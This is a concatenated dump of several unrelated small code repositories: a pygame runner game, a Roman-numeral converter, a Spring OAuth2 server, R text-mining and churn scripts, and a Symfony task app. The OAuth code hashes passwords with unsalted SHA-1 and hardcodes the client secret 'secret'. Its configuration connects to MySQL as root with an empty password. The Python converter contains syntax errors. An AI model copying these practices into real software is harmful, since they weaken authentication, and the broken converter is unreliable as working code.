</Scrollchor>{' '}
</button>
<button className="nav-button">
{' '}
<Scrollchor to="#portfolio" className="nav-link">
Portfolio
</Scrollchor>{' '}
</button>
</div>
<div className="icon-bar">
<a
className="social-link github-link"
href="https://github.com/mariastlouis"
>
{' '}
<FaGithub />{' '}
</a>
<a
className="social-button"
href="../../public/mariaSanchezResume.pdf"
download
>
{' '}
<button className="resume-link">
{' '}
RESUME <FaDownload />
</button>{' '}
</a>
<a
className="social-link linkedin-link"
href="https://www.linkedin.com/in/mariastlouissanchez/"
>
{' '}
<FaLinkedin />{' '}
</a>
</div>
</div>
</div>
</div>
</div>
);
};
export default Header;
|
3687eb4e63bba62fa2074b9728c3137adba11b3a
|
[
"JavaScript"
] | 2
|
JavaScript
|
fnaquira/portfolio
|
d2833170c354da24d3f09dda94d9c40daa7cccbb
|
c30408f2cb688ed49c1e1b47a2b67ae7f7b22baa
|
refs/heads/master
|
<file_sep>import math
#LISTAS
Unidad=["", "I", "II", "III", "IV", "V", "VI", "VII", "VIII", "IX"]
Decena=["", "X", "XX", "XXX", "XL", "L", "LX", "LXX", "LXXX", "XC"]
Centena=["", "C", "CC", "CCC", "CD", "D", "DC", "DCC", "DCCC", "CM"]
Millar = ["", "M", "MM", "MMM"]
#INPUT
Numero=int(input("Ingresa numero entero\n"))
ind_unidad= Numero % 10
ind_decena=int(math.floor(Numero/10))%10
ind_centena=int(math.floor(Numero/100))%10
ind_millar=int(math.floor(Numero/1000))
if(Numero>=1000):
print(Millar[ind_millar]+Centena[ind_centena])+Decena[ind_decena]+Unidad[ind_unidad])
elif(Numero>=100):
print(Centena[index_centena]+Decena[ind_decena]+Unidad[ind_unidad])
elif(Numero>=10):
print(Decena[ind_decena]+Unidad[ind_unidad])
else:
print(Unidad[Numero])<file_sep>"# Numeros-decimales-a-romanos-con-Python"
"# Numeros-decimales-a-romanos-con-Python"
|
c09878d7a66b61fa0ce43ec71a58aef8448177e7
|
[
"Markdown",
"Python"
] | 2
|
Python
|
MaritoAllen/Numeros-decimales-a-romanos-con-Python
|
ae074559356aab2b13b1a299a940c51aba0709cd
|
c93790ebf7e3c65f05b472110427aa3e12dfb924
|
refs/heads/main
|
<repo_name>FelipeDSR/CyberPY<file_sep>/Player.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Player.py
#
# @brief Arquivo da classe Player
# @section Descrição
# Essa classe é provavelmente a mais importante.
# Ela é responsavel por acionar as ações da Viper, verificar os inputs do jogo
import pygame
from Input import Input
from Actions import Actions
from Configs import *
class Player(pygame.sprite.Sprite):
def __init__(self):
super(Player, self).__init__()
# Instancia da classe Input
self.input = Input(self)
# diz se a Viper esta no ar (caindo)
self.inAir = False
# armazena as animações da Viper
self.actions = Actions()
# a animação atual
self.currentAction = self.actions.run
# a imagem da animação atual
self.image = self.currentAction.image
# mascara de colisão da imagem atual
self.mask = pygame.mask.from_surface(self.image)
# armazena posição na tela e tamanho de um sprite
self.rect = self.image.get_rect()
self.rect[0] = SCREEN_WIDTH / 2 - PLAYER_WIDTH
self.rect[1] = FLOOR
# velocidade vertical
self.speedy = 0
# gravidade
self.gravity = 1
def update(self):
# é como a gravidade, ela ta sempre excencendo uma força
# para a viper não cair no limbo a velocidade Y se torna zero quando atinge o chão
self.rect[1] += self.speedy
# verifica se a Viper não está tocando o chão
if self.rect[1] < FLOOR:
# se sim ela está no Ar e a gravidade é exercida sobre ela
self.inAir = True
self.speedy += self.gravity
else:
# se não ela não está no ar e ela para de cair
self.inAir = False
self.speedy = 0
# atualiza a animação atual
self.currentAction.update()
# verifica inputs
self.input.checkForInput()
# atualiza a imagem atual da Viper
self.image = self.currentAction.image
# atualiza a mascara para colisão da Viper (importante porque a
# área de contato dela pode mudar depenndendo da ação dela)
self.mask = pygame.mask.from_surface(self.image)
def run(self):
# muda a animação atual para "correndo" se ela nao estiver no ar
if not self.inAir:
self.currentAction = self.actions.run
def jump(self):
# muda a animação atual para "pulando" se ela nao estiver no ar
# evita que ela de dois saltos no ar
if not self.inAir:
self.currentAction = self.actions.jump
self.speedy = -15
def crouch(self):
# muda a animação atual para "abaixada" se ela nao estiver no ar
if not self.inAir:
self.currentAction = self.actions.crouch<file_sep>/Input.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Input.py
#
# @brief Arquivo da classe Input
# @section Descrição
# Essa classe é responsável por verificar todos comandos acionados pelo jogador.
import pygame
from pygame.locals import *
import sys
class Input:
def __init__(self, entity):
# é a entidade do jogador principal onde será possivel
# acionar métodos de gerenciamento de animações e ações.
self.entity = entity
def checkForInput(self):
# esse método verifica os eventos do teclado ou se o jogo, acabou ou reiniciou
events = pygame.event.get()
self.checkForKeyboardInput()
self.checkForQuitAndRestartInputEvents(events)
def checkForKeyboardInput(self):
# verifica a tecla apetada
pressedKeys = pygame.key.get_pressed()
# abaixa
if pressedKeys[K_DOWN] or pressedKeys[K_s] and not pressedKeys[K_SPACE]:
self.entity.crouch()
# pula
elif pressedKeys[K_SPACE] and not pressedKeys[K_DOWN]:
self.entity.jump()
# corre (ação padrão no jogo)
else:
self.entity.run()
def checkForQuitAndRestartInputEvents(self, events):
# verifica se o jogo foi fechado
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
<file_sep>/Game.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Game.py
#
# @brief Arquivo principal do jogo CyberPY
#
# @section Descrição
# O objetivo do jogo é alcançar o máximo de pontos possíveis.
# O jogador controla a personagem Viper que pode abaixar e pular
# equanto segue correndo e desviando dos veículos para continuar viva.
import pygame
from random import randrange
# Classe que contém controles e informações personagem Viper
from Player import Player
# Classe do drone
from Drone import Drone
# Classe do veículo vermelho
from RedVehicle import RedVehicle
# Classe do veículo amarelo
from YellowVehicle import YellowVehicle
# Classe que controla o plano de fundo
from Ground import Ground
# Constantes usadas no jogo como velociade, altura etc.
from Configs import *
# inicialização do pygame
pygame.init()
# carregando a fonte para o score
font = pygame.font.SysFont("monospace", 16)
GREEN = (0,255,0)
# colocando uma música de fundo
pygame.mixer.music.load("./sounds/cyberpunk-street.ogg")
# o play(-1) serve para a música ficar em loop eterno
pygame.mixer.music.play(-1)
# configurando a tela do jogo
screen = pygame.display.set_mode(SCREEN_SIZE)
# o jogo contém três fundo
# cada fundo tem uma velocidade menor para dar impressão de movimento
bg_1_group = pygame.sprite.Group()
bg_2_group = pygame.sprite.Group()
bg_3_group = pygame.sprite.Group()
for i in range(2):
# a imagem de cada fundo é carregada e adicionad em um grupo de sprites
# elas são adicionadas duas vezes
bg_1 = Ground("./layers/bg-1.png", BG_1_SPEED, i * SCREEN_WIDTH)
bg_1_group.add(bg_1)
bg_2 = Ground("./layers/bg-2.png", BG_2_SPEED, i * SCREEN_WIDTH)
bg_2_group.add(bg_2)
bg_3 = Ground("./layers/bg-3.png", BG_3_SPEED, i * SCREEN_WIDTH)
bg_3_group.add(bg_3)
# instancia da personagem Viper
player = Player()
player_group = pygame.sprite.Group(player)
# o primeiro veículo é o vermelho
redVehicle = RedVehicle()
# enemy_group é o grupo de inimigos que podem colidir com a Viper
enemy_group = pygame.sprite.Group(redVehicle)
# clock do jogo
clock = pygame.time.Clock()
# essa função verifica se um sprite saiu da tela
def shouldKillSprite(sprite):
return sprite.rect[0] < -(sprite.rect[2])
score = 0
while True:
# quando um background sai da tela, removemos ele e adicionamos no final
# dessa forma os prédios no fundo nunca deixam de aparecer
if shouldKillSprite(bg_1_group.sprites()[0]):
bg_1_group.remove(bg_1_group.sprites()[0])
new_ground = Ground("./layers/bg-1.png", BG_1_SPEED, SCREEN_WIDTH)
bg_1_group.add(new_ground)
if shouldKillSprite(bg_2_group.sprites()[0]):
bg_2_group.remove(bg_2_group.sprites()[0])
new_ground = Ground("./layers/bg-2.png", BG_2_SPEED, SCREEN_WIDTH)
bg_2_group.add(new_ground)
if shouldKillSprite(bg_3_group.sprites()[0]):
bg_3_group.remove(bg_3_group.sprites()[0])
new_ground = Ground("./layers/bg-3.png", BG_3_SPEED, SCREEN_WIDTH - (FPS/BG_3_SPEED))
bg_3_group.add(new_ground)
# se não houver inimigos na tela iremos adicionar um de forma aleatória
if len(enemy_group.sprites()) == 0 or shouldKillSprite(enemy_group.sprites()[0]):
if len(enemy_group.sprites()) > 0:
enemy_group.remove(enemy_group.sprites()[0])
# vamos usar um alcance de 0 a 30
x = randrange(31)
# para x entre 0 e 10 adicionaremos o veiculo vermelho
if x <= 10 :
newEnemy = RedVehicle()
# para x entre 10 e 20 adicionaremos o veiculo amarelo
elif x <= 20:
newEnemy = YellowVehicle()
# acima de 20 teremos um drone na tela
else:
newEnemy = Drone()
enemy_group.add(newEnemy)
# atualizamos os backgrounds, player e inimigos
bg_1_group.update()
bg_2_group.update()
bg_3_group.update()
player_group.update()
enemy_group.update()
# desenhando todas as entidades na tela
bg_1_group.draw(screen)
bg_2_group.draw(screen)
bg_3_group.draw(screen)
player_group.draw(screen)
enemy_group.draw(screen)
# atualização do score
scoretext = font.render(f"Score {score}", 1, GREEN)
screen.blit(scoretext, (5, 10))
score += 1
# atualizando a tela
pygame.display.update()
clock.tick(FPS)
# aqui é verificada se houve colisão entre dois grupos de sprites
if pygame.sprite.groupcollide(player_group, enemy_group, False, False, pygame.sprite.collide_mask):
# se colidirem o score volta a zero
enemy_group.remove(enemy_group.sprites()[0])
score = 0<file_sep>/YellowVehicle.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file YellowVehicle.py
#
# @brief Arquivo da classe do inimigo veículo amarelo
from Enemy import Enemy
class YellowVehicle(Enemy):
"""
Essa classe extende a classe Enemy e simplesmente invoca
o construtor passando seus atributos padrões, é mais para
facilitar na hora de instanciar um novo objeto.
"""
def __init__(self):
super().__init__(
path = "./vehicles/v-yellow.png",
speed = 8,
xpos = 20,
ypos = 80,
width = 80,
height = 80
)<file_sep>/Configs.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Configs.py
#
# @brief Arquivo com constantes usadas
SCREEN_WIDTH = 600
SCREEN_HEIGHT = 400
PLAYER_WIDTH = 100
PLAYER_HEIGHT = 120
PLAYER_SIZE = (PLAYER_WIDTH, PLAYER_HEIGHT)
SCREEN_SIZE = (SCREEN_WIDTH, SCREEN_HEIGHT)
FLOOR = SCREEN_HEIGHT - PLAYER_HEIGHT - 10
VEHICLE_SPEED = 10
BG_1_SPEED = 1
BG_2_SPEED = 2
BG_3_SPEED = 3
FPS = 60<file_sep>/Actions.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Actions.py
#
# @brief Arquivo da classe de ações da personagem Viper
import pygame
from os import listdir
from Animation import Animation
from Configs import PLAYER_SIZE
class Actions:
def __init__(self):
# basicamente todos as animações são carregadas
self.run = Animation(self.loadSprites("./player/run/"))
self.jump = Animation(self.loadSprites("./player/jump/"))
self.crouch = Animation(self.loadSprites("./player/crouch/"))
self.hurt = Animation(self.loadSprites("./player/hurt/"))
def loadSprites(self, path):
# carrega as imagens em um diretório especifico
files = listdir(path)
images = [pygame.image.load(path + file).convert_alpha() for file in files]
images = [pygame.transform.scale(image, PLAYER_SIZE) for image in images]
return images<file_sep>/Drone.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Drone.py
#
# @brief Arquivo da classe do inimigo Drone
from Enemy import Enemy
class Drone(Enemy):
"""
Essa classe extende a classe Enemy e simplesmente invoca
o construtor passando seus atributos padrões, é mais para
facilitar na hora de instanciar um novo objeto.
"""
def __init__(self):
super().__init__(
path = "./drone/drone.png",
speed = 10,
xpos = 20,
ypos = 10,
width = 80,
height = 80
)<file_sep>/RedVehicle.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file RedVehicle.py
#
# @brief Arquivo da classe do inimigo veículo vermelho
from Enemy import Enemy
class RedVehicle(Enemy):
"""
Essa classe extende a classe Enemy e simplesmente invoca
o construtor passando seus atributos padrões, é mais para
facilitar na hora de instanciar um novo objeto.
"""
def __init__(self):
super().__init__(
path = "./vehicles/v-red.png",
speed = 7,
xpos = 20,
ypos = 80,
width = 150,
height = 120
)<file_sep>/README.md
# CyberPY!
Este é um jogo onde você deve desviar dos veículos e se manter vivo
# Instalação
Para instalar o jogo e rodar na sua máquina será necessário ter o python 3 e o pip instalados.
Baixe a biblioteca pygame através do pip
```bash
pip install pygame
```
Agora basta rodar o arquivo Game.py
<file_sep>/Enemy.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Enemy.py
#
# @brief Arquivo da classe Enemy
import pygame
from Configs import SCREEN_WIDTH, SCREEN_HEIGHT
class Enemy(pygame.sprite.Sprite):
def __init__(self, path, speed, xpos, ypos, width, height):
super(Enemy, self).__init__()
# é a imagem do veículo, o convert_aplha() do pygame remove toda a parte
# transparente em volta da imagem, então a máscara dela será fiel ao contorno
# do veículo e não um block retangular.
self.image = pygame.image.load(path).convert_alpha()
self.image = pygame.transform.scale(self.image, (width, height))
# é feita uma máscara em cima da imagem PNG do veículo onde todos os pixels
# do veiculo servirão para detectar colisões.
self.mask = pygame.mask.from_surface(self.image)
# é um atributo da classe Sprite do pygame para ter referência de posição e
# tamanho do objeto na tela.
self.rect = self.image.get_rect()
self.rect[0] = SCREEN_WIDTH + width + xpos
self.rect[1] = SCREEN_HEIGHT - height - ypos
# Velocidade do inimigo
self.speed = speed
def update(self):
"""
Esse método: atualiza a posição horizontal do veículo (o que faz ele se mover em direção ao player).
"""
self.rect[0] -= self.speed
<file_sep>/Ground.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Ground.py
#
# @brief Arquivo da classe Ground
# @section Descrição
# Essa classe é responsável por movimentar cada um dos três backgrounds.
import pygame
from Configs import SCREEN_WIDTH, SCREEN_HEIGHT
class Ground(pygame.sprite.Sprite):
def __init__(self, path, speed, xpos = 0):
pygame.sprite.Sprite.__init__(self)
# velocidade que ele se move
self.speed = speed
# imagem
self.image = pygame.image.load(path).convert_alpha()
self.image = pygame.transform.scale(self.image, (SCREEN_WIDTH, SCREEN_HEIGHT))
# rect é um atributo da classe Sprite do pygame que armazena
# referencia da posição de um sprite na tela e seu tamanho.
self.rect = self.image.get_rect()
self.rect[0] = xpos
self.rect[1] = 0
def update(self):
# movimenta o fundo para trás (assim a Viper parece ir pra frente)
self.rect[0] -= self.speed<file_sep>/Animation.py
"""! @cyberPY Jogo cyberpunk 2D"""
##
# @file Animation.py
#
# @brief Arquivo da classe de animações do jogo CyberPY
class Animation:
def __init__(self, images, deltaTime=8):
# imagens para a animação
self.images = images
# tempo que uma animação leva para ser completada
self.timer = 0
self.index = 0
# imagem atual da animação
self.image = self.images[self.index]
self.deltaTime = deltaTime
def update(self):
# metodo de atualização onde a imagem atual é passado para a próxima
self.timer += 1
if self.timer % self.deltaTime == 0:
if self.index < len(self.images) - 1:
self.index += 1
else:
self.index = 0
self.image = self.images[self.index]
|
d78a2ca4813272ae325b3e152810714d1bb33f6b
|
[
"Markdown",
"Python"
] | 12
|
Python
|
FelipeDSR/CyberPY
|
cd6ef85bdcd4a579806fd28ad3e1f79a268977bb
|
18be80fe89ec946888f8b0c79c2fba5bfd3e91c9
|
refs/heads/master
|
<file_sep>package com.itesm.oauth.conf;
import com.itesm.oauth.service.AuthProvider;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.authentication.AuthenticationManager;
import org.springframework.security.config.annotation.authentication.builders.AuthenticationManagerBuilder;
import org.springframework.security.oauth2.config.annotation.configurers.ClientDetailsServiceConfigurer;
import org.springframework.security.oauth2.config.annotation.web.configuration.AuthorizationServerConfigurerAdapter;
import org.springframework.security.oauth2.config.annotation.web.configuration.EnableAuthorizationServer;
import org.springframework.security.oauth2.config.annotation.web.configurers.AuthorizationServerEndpointsConfigurer;
/**
* Configuracion para OAuth2.
*
* @author mklfarha
*
*/
@Configuration
@EnableAuthorizationServer
public class OAuth2Config extends AuthorizationServerConfigurerAdapter {
private static final Logger logger = LoggerFactory.getLogger(OAuth2Config.class);
@Autowired
private AuthProvider authenticationProvider;
@Autowired
private AuthenticationManager authenticationManager;
@Value("${itesm.oauth.tokenTimeout:-1}")
private int expiration;
@Override
public void configure(AuthorizationServerEndpointsConfigurer configurer) throws Exception {
configurer.authenticationManager(authenticationManager)
.approvalStoreDisabled();
}
@Override
public void configure(ClientDetailsServiceConfigurer clients) throws Exception {
clients.inMemory()
.withClient("demo")
.secret("secret")
.accessTokenValiditySeconds(expiration)
.scopes("read", "write")
.authorizedGrantTypes("authorization_code", "password", "refresh_token", "client_credentials", "implicit")
.resourceIds("service");
}
@Autowired
public void configure(AuthenticationManagerBuilder auth) throws Exception {
logger.debug("configurando provider");
auth.authenticationProvider(authenticationProvider);
}
}
<file_sep>package com.itesm.oauth.service;
import org.apache.commons.codec.digest.DigestUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.jdbc.core.JdbcTemplate;
import org.springframework.security.authentication.AuthenticationProvider;
import org.springframework.security.authentication.BadCredentialsException;
import org.springframework.security.authentication.UsernamePasswordAuthenticationToken;
import org.springframework.security.core.Authentication;
import org.springframework.security.core.AuthenticationException;
import org.springframework.stereotype.Service;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import java.util.ArrayList;
import java.util.Map;
/**
*
* @author mklfarha
* AuthProvider for Oauth2
*/
@Service
public class AuthProvider implements AuthenticationProvider {
@Autowired
private JdbcTemplate template;
static final Logger logger = LoggerFactory.getLogger(AuthProvider.class);
@Override
public Authentication authenticate(Authentication authentication) throws AuthenticationException {
final String username = (String)authentication.getPrincipal();
final String password = (String)authentication.getCredentials();
if (isValidEmailAddress(username)) {
Map<String,Object> user = template.queryForMap("Select * from usuario where email = ? limit 1", username);
if (user == null) {
throw new BadCredentialsException("Persona no encontrada con el nombre usuario/correo: " + username);
}
if (!user.get("contrasena").equals(DigestUtils.sha1Hex(password))) {
throw new BadCredentialsException("Identificación Incorrecta");
}
user.put("contrasena",null);
return new UsernamePasswordAuthenticationToken(user, null, new ArrayList<>() );
} else {
throw new BadCredentialsException("Correo con formato incorrecto: " + username);
}
}
public static boolean isValidEmailAddress(String email) {
boolean result = true;
try {
InternetAddress emailAddr = new InternetAddress(email);
emailAddr.validate();
} catch (AddressException ex) {
result = false;
}
return result;
}
@Override
public boolean supports(Class<?> type) {
logger.debug("supports class: {}", type);
return type.equals(UsernamePasswordAuthenticationToken.class);
}
}
<file_sep>server.port=8081
spring.datasource.url=jdbc:mysql://localhost/mydb?useSSL=false
spring.datasource.username=root
spring.datasource.password=
spring.datasource.driver-class-name=com.mysql.jdbc.Driver
logging.level.org.springframework.security=DEBUG
|
8fe6d1b299a0f9a9714273c2fac603476a770283
|
[
"Java",
"INI"
] | 3
|
Java
|
PabloEnriquez/drop-fixOauth
|
196f25b2fdfeb5522984b33b5974bcf0a986efc8
|
d6f0f65e124be779c2218f650eefd10ff59780d3
|
refs/heads/master
|
<file_sep>########################Importing libraries##################################
#install.packages("xgboost")
library(lattice)
library(Matrix)
library(xgboost)
library(caret)
library(dplyr)
library(Hmisc)
library(reshape)
library(magrittr)
#install.packages("tm")
#install.packages("tidytext")
library(twitteR)
library(tm)
library(tidyr)
library(tidytext)
#############################Importing data##################################
#tweet_data<-read.csv("tweets.csv")
#install.packages("rtweet")
library(rtweet)
rt <- search_tweets("#facebook lang:en", n = 18000, include_rts = TRUE, parse = TRUE, type = "mixed")
names(rt)
tweets_data <- rt %>%
select(user_id,text, screen_name, created_at)
# Tokenize
tidy_tweets <- tweets_data %>%
unnest_tokens(word, text)
library(dplyr)
# # Clean
# cleantidytweets <- anti_join(tidy_tweets,get_stopwords())
cleantidytweets<-dplyr::anti_join(tidy_tweets, tidytext::get_stopwords())
str(cleantidytweets)
cleantidytweets$n_char<-nchar(cleantidytweets$word)
cleantidytweets_filtered<-cleantidytweets %>%
filter(n_char>2)
cleantidytweets_filtered_2 <-cleantidytweets_filtered %>%
filter(word !="http") %>%
filter(word !="https") %>%
filter(word !="facebook") %>%
filter(word !="amp") %>%
filter(word !="t.co")
word_count<-count(cleantidytweets_filtered_2, word, sort = TRUE)
word_count$word <- reorder(word_count$word, word_count$n)
word_count_sample <- head(word_count, 20)
ggplot2::ggplot(word_count_sample, ggplot2::aes(x = word, y = n)) +
ggplot2::geom_col() +
ggplot2::coord_flip() +
ggpubr::theme_pubclean()
######## Q1. Which words are most commonly used in the dataset?#############
# May, Social, People, Soviet,community are commonly used words
######## Q2. Word Cloud Fact ###############################################
#install.packages("wordcloud")
library(wordcloud)
wordcloud::wordcloud(word_count$word, word_count$n, min.freq = 1, max.words = 100, random.order=FALSE)
#####
######Wordcloud clearly indicates that the tweets are associated with WW2 Victory day
######## Q3. Tf-idf ######################################################
word_tf.count <- dplyr::count(cleantidytweets, user_id, word, sort = TRUE)
word_count_tfidf<-word_tf.count
word_count_tfidf$word<-as.character(word_count_tfidf$word)
word_count_tfidf <- word_count_tfidf[which(word_count_tfidf$n > 5 &
word_count_tfidf$word != "facebook" &
nchar(word_count_tfidf$word) > 5),]
head(word_count_tfidf)
tidytext::bind_tf_idf(word_count_tfidf,user_id, word, n)
#########
wordcloud::wordcloud(word_count_tfidf$word, word_count_tfidf$n, min.freq = 1, max.words = 1000, random.order=FALSE)
#########Q4. Join Sentiment and Viz sentiment#######################
#install.packages("textdata")
library(textdata)
fb_df.sen <- dplyr::inner_join(cleantidytweets, tidytext::get_sentiments("nrc"), by = "word")
fb_df.sen <- dplyr::inner_join(fb_df.sen, tidytext::get_sentiments("afinn"), by = "word")
head(fb_df.sen, 10)
fb_df.sen_count <- count(fb_df.sen, sentiment, word, sort = TRUE)
fb_df.sen_count$word <- reorder(fb_df.sen_count$word, fb_df.sen_count$n)
fb_df.sen_count <- by(fb_df.sen_count, fb_df.sen_count["sentiment"], head, n=5)
fb_df.sen_count <- Reduce(rbind, fb_df.sen_count)
ggplot2::ggplot(fb_df.sen_count, ggplot2::aes(x = word, y = n, fill = sentiment)) +
ggplot2::geom_col(show.legend = FALSE) +
ggplot2::facet_wrap(~sentiment, scales = "free") +
ggplot2::labs(y = "Contribution to sentiment", x = NULL) +
ggplot2::coord_flip() +
ggpubr::theme_pubclean()
######## The most common sentiments are fear, sadness,anger
######## Q5. Are the posts about facebook rather positive, or rather#####
# negative? (note: feel free to apply a simple mean)
fb_df.sen_response<-fb_df.sen_count %>%
group_by(sentiment) %>%
summarise(response=sum(n))
####### #The posts about facebook are postive
<file_sep>library(MASS)
library(dplyr)
library(caret)
library(pROC)
getwd()
data <- read.csv("data for problem B.csv", header = T)
sum(is.na(data))
Num_Var <- scale(data[,c(3,6,9,14)])
data[,c(3,6,9,14)] <- NULL
str(data)
data_appended <- cbind(data, Num_Var)
str(data_appended)
# No missing values in entire dataset
# Test/Train split
train <- data_appended[1:700,]
test <- data_appended[701:1000,]
length(train$checkingstatus1)
str(train)
# LOGISTIC REGRESSION
model <- glm(train$Default ~ ., family = binomial,
data = train) %>%
stepAIC(trace = FALSE)
model_nonAIC <- glm(train$Default ~ ., family = binomial,
data = train)
model_nonAIC$aic-model$aic
# AIC reduced by 13.50033
variables <- as.data.frame(list(model$coefficients))
variable_nonaic <- as.data.frame((list(model_nonAIC$coefficients)))
nrow(variable_nonaic)-nrow(variables)
# To summarize, the AIC "optimised" model has higher fit
prob <- model %>% predict(test, type="response")
prob
test$Default
ROC_Curve<- roc(test$Default, prob, plot=TRUE, legacy.axes=TRUE ,out = FALSE)
plot(ROC_Curve, print.thres="best", col="#377eb8", lwd=4, print.auc=TRUE)
# Logistic Regression proves to be a good model with AUC: 0.775
Prob <- as.data.frame(prob)
Classification <- ifelse(prob > 0.068,1,0)
Classification <- as.factor(Classification)
Test_ref <- as.factor(test$Default)
ConfX <- confusionMatrix(Classification, reference = Test_ref, positive = '1')
ConfX
# Random Forest
library(randomForest)
Model_RM <- randomForest(factor(train$Default) ~ ., data= train)
Model_RM$votes[,1]
Model_RM2 <- randomForest(train$Default ~ ., mtry = 2 ,data= train, importance=TRUE)
Model_RM2
pred_RM <- predict(Model_RM, test, type= "prob")
pred_RM
ROC_RF<- roc(test$Default, pred_RM[,1], percent = T, col="#4daf4a", lwd=4)
plot(ROC_RF, print.thres="best", col="#4daf4a", lwd=4, print.auc=TRUE)
# We see that using Random Forest only decreases the AUC marginally. We go from 0.775 using
# Logistic Regression to 0.773 using Random Forest. Because both are equally easy to interpret,
# and that they are more or less computationally equal (atleast on a dataset of this size)
# I would chose Logistic Regression as my Model
<file_sep>data <- read.csv("kkbox(1).csv", sep =",")
library(tidyverse)
library(ggpubr)
#train/test split
data1 = sort(sample(nrow(data), nrow(data)*.7))
train <- data[data1,]
test <- data[-data1,]
#Task 1
theme_set(theme_pubr())
head(train,4)
ggplot(train, aes(x = city , y= is_churn )) + geom_point() + stat_smooth()
input <- "is_churn ~ age + gender + payment_plan_days + plan_list_price + actual_amount_paid + n_transactions + is_cancel"
glm(formula = input, family = binomial(link ="logit"), data = train)
install.packages("margins")
library("margins")
x <- glm(input, family=binomial (link ='logit'), data=data)
m<- margins(x)
summary(m)
glm(formula = is_churn ~ n_transactions + is_cancel, family = binomial (link = "logit"), data = train)
fitted.results <- predict(x, test, type='response')
fitted.results <- ifelse(fitted.results > 0.1,1,0)
misClasificError <- mean(fitted.results != test$is_churn)
print(1-misClasificError)
#Task 2 clasification tree
install.packages("rpart")
library("rpart")
kkboxtree <- rpart(input, train, method ="class")
printcp(kkboxtree)
my_prediction <- predict(kkboxtree, test, type="class")
tree_error <- mean(my_prediction != test$is_churn)
print(1-tree_error)
|
4aaac512c5b6424b41de2409c8d3fdf39542bfb7
|
[
"R"
] | 3
|
R
|
anim10/ESCP-and-side-projects
|
50037d45b4c8f67256bfcd4a91ddb3dff9df4585
|
0ecffbe7990877437d5cebb6e886953371efcf0b
|
refs/heads/master
|
<repo_name>nripeshtrivedi/Symfony_project<file_sep>/app/cache/dev/twig/3b/35/0b5f56cbcfe19719aaf02a4719e5247f52c441491f475542a09bdc00ba6b.php
<?php
/* AcmeTaskBundle:Default:new.html.twig */
class __TwigTemplate_3b350b5f56cbcfe19719aaf02a4719e5247f52c441491f475542a09bdc00ba6b extends Twig_Template
{
public function __construct(Twig_Environment $env)
{
parent::__construct($env);
$this->parent = false;
$this->blocks = array(
);
}
protected function doDisplay(array $context, array $blocks = array())
{
// line 1
echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
\t <style type=\"text/css\">
\t\t#mydiv
\t\t{
\t\t\tposition:absolute;
\t\t\ttop: 50%;
\t\t\tleft: 50%;
\t\t\twidth:30em;
\t\t\theight:6em;
\t\t\tmargin-top: -9em; /*set to a negative number 1/2 of your height*/
\t\t\tmargin-left: -15em; /*set to a negative number 1/2 of your width*/
\t\t\tborder: 1px solid #ccc;
\t\t\tbackground-color: #f3f3f3;
\t\t}
\t</style>
<title>All Records</title>
</head>
<body>
\t\t<div id=\"mydiv\">
\t\t\t";
// line 23
echo $this->env->getExtension('form')->renderer->renderBlock((isset($context["form"]) ? $context["form"] : $this->getContext($context, "form")), 'form');
echo "
\t\t\t\t<ol id=\"task\">
\t\t\t\t\t";
// line 25
$context['_parent'] = (array) $context;
$context['_seq'] = twig_ensure_traversable((isset($context["task"]) ? $context["task"] : $this->getContext($context, "task")));
foreach ($context['_seq'] as $context["_key"] => $context["item"]) {
// line 26
echo "\t\t\t\t\t\t<li>";
echo twig_escape_filter($this->env, $this->getAttribute((isset($context["item"]) ? $context["item"] : $this->getContext($context, "item")), "task"), "html", null, true);
echo "</li>
\t\t\t\t\t\t";
// line 27
echo twig_escape_filter($this->env, twig_date_format_filter($this->env, $this->getAttribute((isset($context["item"]) ? $context["item"] : $this->getContext($context, "item")), "dueDate"), "Y-m-d"), "html", null, true);
echo "
\t\t\t\t\t";
}
$_parent = $context['_parent'];
unset($context['_seq'], $context['_iterated'], $context['_key'], $context['item'], $context['_parent'], $context['loop']);
$context = array_intersect_key($context, $_parent) + $_parent;
// line 29
echo "\t\t\t\t</ol>
\t\t</mydiv>
</body>
</html>";
}
public function getTemplateName()
{
return "AcmeTaskBundle:Default:new.html.twig";
}
public function isTraitable()
{
return false;
}
public function getDebugInfo()
{
return array ( 65 => 29, 57 => 27, 52 => 26, 48 => 25, 43 => 23, 19 => 1,);
}
}
<file_sep>/src/Acme/TaskBundle/Controller/DefaultController.php
<?php
namespace Acme\TaskBundle\Controller;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Acme\TaskBundle\Entity\Task;
use Symfony\Component\HttpFoundation\Request;
use Acme\TaskBundle\Form\Type\TaskType;
class DefaultController extends Controller
{
public function newAction(Request $request)
{
// create a task
$task = new Task();
$task->setTask('Write a task');
$task->setDueDate(new \DateTime('tomorrow'));
$form = $this->createForm(new TaskType(), $task);
$em = $this->getDoctrine()->getManager();
$form->handleRequest($request);
if ($form->isValid())
{
$task = $form->getData();
$em->persist($task);
$em->flush();
}
$repository = $this->getDoctrine()
->getRepository('AcmeTaskBundle:Task');
$tasks = $repository->findAll();
return $this->render('AcmeTaskBundle:Default:new.html.twig', array(
'form' => $form->createView(),'task'=>$tasks,
));
}
}
|
15c4fef4f56e85b2351f1d0e5f2c5b04e1bb9357
|
[
"PHP"
] | 2
|
PHP
|
nripeshtrivedi/Symfony_project
|
2938edec57e788a2c2e1fbca3655e2d0b927626c
|
903c60ce5a2cbfde7871e8da83f36f938bb04b4f
|
